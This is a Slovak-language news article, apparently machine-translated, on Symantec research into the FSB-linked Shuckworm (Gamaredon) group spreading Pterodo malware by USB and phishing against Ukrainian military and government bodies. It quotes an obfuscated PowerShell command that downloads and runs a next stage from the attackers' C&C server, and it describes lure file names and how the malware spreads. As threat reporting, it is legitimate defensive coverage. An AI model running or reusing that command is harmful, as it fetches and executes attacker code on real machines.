Getty Images
Hackeri pracujúci pre ruskú Federálnu bezpečnostnú službu vykonali viacero kybernetických útokov, ktoré používali malvér založený na USB. ukradnúť veľké množstvo údajov z ukrajinských cieľov na použitie pri prebiehajúcej invázii svojho menšieho suseda, výskumníkov povedal.
„Sektory a povaha cieľových organizácií a strojov mohli útočníkom poskytnúť prístup značné množstvo citlivých informácií,“ napísali výskumníci zo spoločnosti Symantec, ktorú teraz vlastní Broadcom Štvrtkový príspevok. „V niektorých organizáciách boli náznaky, že útočníci boli na strojoch oddelení ľudských zdrojov organizácií, čo naznačuje, že informácie o jednotlivcoch pracujúcich v rôznych organizáciách boli pre útočníkov okrem iného prioritou.
Skupina, ktorú Symantec sleduje ako Shuckworm a ďalší výskumníci nazývajú Gamaredon a Armagedon, má pôsobí od roku 2014 a je napojený na ruskú FSB, hlavnú bezpečnostnú službu v tejto oblasti krajina. Skupina sa zameriava výlučne na získavanie spravodajských informácií o ukrajinských cieľoch. V roku 2020 výskumníci z bezpečnostnej firmy SentinelOne
povedal hackerská skupina „zaútočila na viac ako 5 000 jednotlivých subjektov po celej Ukrajine, s osobitným zameraním na oblasti, kde sú rozmiestnené ukrajinské jednotky“.Vo februári Shuckworm začal nasadzovať nový malvér a infraštruktúru velenia a riadenia, ktorá sa úspešne podarila prenikol do obrany viacerých ukrajinských organizácií v armáde, bezpečnostných službách a vláde krajina. Zdá sa, že členovia skupiny sa najviac zaujímajú o získavanie informácií súvisiacich s citlivými vojenskými informáciami, ktoré by mohli byť zneužité pri prebiehajúcej ruskej invázii.
Táto novšia kampaň predstavila nový malvér vo forme skriptu PowerShell, ktorý šíri Pterodo, zadné vrátka vytvorené Shuckwormom. Skript sa aktivuje, keď sú infikované jednotky USB pripojené k cieľovým počítačom. Škodlivý skript sa najskôr skopíruje na cieľový počítač, aby vytvoril súbor skratky s príponou rtf.lnk. Súbory majú názvy ako video_porn.rtf.lnk, do_not_delete.rtf.lnk a evidence.rtf.lnk. Názvy, ktoré sú väčšinou v ukrajinskom jazyku, sú pokusom nalákať ciele, aby otvorili súbory, aby si nainštalovali Pterodo na počítače.
Skript pokračuje vo vyčíslení všetkých jednotiek pripojených k cieľovému počítaču a skopíruje sa na všetky pripojené vymeniteľné jednotky, s najväčšou pravdepodobnosťou v nádeji, že infikujú akékoľvek zariadenia so vzduchovou medzerou, ktoré nie sú zámerne pripojené k internetu, v snahe zabrániť tomu, aby boli hacknutý.
Aby zakryl stopy, Shuckworm vytvoril desiatky variantov a rýchlo zmenil IP adresy a infraštruktúru, ktorú používa na velenie a riadenie. Skupina tiež používa legitímne služby, ako je Telegram a jej mikroblogovacia platforma Telegraph na velenie a kontrolu v ďalšom pokuse vyhnúť sa odhaleniu.
Shuckworm zvyčajne používa phishingové e-maily ako počiatočný vektor do počítačov cieľov. E-maily obsahujú škodlivé prílohy, ktoré sa tvária ako súbory s príponami vrátane .docx, .rar, .sfx, lnk a hta. E-maily často využívajú témy, ako sú ozbrojené konflikty, trestné konania, boj proti zločinu a ochrana detí, ako návnady na získanie cieľov na otvorenie e-mailov a kliknutie na prílohy.
Vedci spoločnosti Symantec uviedli, že infikovaný počítač, ktorý obnovili v kampani, bol typický pre spôsob, akým funguje. Oni napísali:
U jednej obete bolo prvým príznakom zákernej aktivity, keď používateľ otvoril archívny súbor RAR, ktorý bol pravdepodobne doručený prostredníctvom e-mailu typu spear-phishing a ktorý obsahoval škodlivý dokument.
Po otvorení dokumentu bolo spozorované spustenie škodlivého príkazu PowerShell na stiahnutie ďalšej fázy dát zo servera C&C útočníkov:
"CSIDL_SYSTEM\cmd.exe" /c štart /min "" powershell -w skryté
"$gt='/get.'+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4
8);[system.net.servicepointmanager]::servercertificatevalidationcallb
ack={$true};$hosta+='.vafikgo.';$hosta+=[char](57+57);$hosta+=[char](
60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad
dresslist[0];$client=(nový-objekt
net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloads
tring($faddr);iex $text"Nedávno spoločnosť Symantec spozorovala, že Shuckworm využíva vo svojich skriptoch PowerShell viac adries IP. Pravdepodobne ide o pokus vyhnúť sa niektorým metódam sledovania, ktoré používajú výskumníci.
Shuckworm tiež pokračuje v aktualizácii techník zahmlievania používaných vo svojich skriptoch PowerShell v snahe vyhnúť sa detekcii, pričom v období od januára do apríla sa mesačne pozoruje až 25 nových variantov skriptov skupiny 2023.
Štvrtkový príspevok obsahuje IP adresy, hash, názvy súborov a ďalšie indikátory kompromisov, ktoré môžu ľudia použiť na zistenie, či boli zacielení. Príspevok tiež varuje, že skupina predstavuje hrozbu, ktorú by mali ciele brať vážne.
"Táto aktivita dokazuje, že Shuckwormovo neúnavné zameranie na Ukrajinu pokračuje," napísali. "Zdá sa jasné, že útočné skupiny podporované ruskými národnými štátmi pokračujú v laserovom útočení na ukrajinské ciele v snahe nájsť údaje, ktoré by mohli potenciálne pomôcť ich vojenským operáciám."
![Všetky vodné cesty Ameriky na jednej mape [infographic]](/f/d17ad714ebe005c95f4523ac6fad5315.jpg?width=81&height=81)
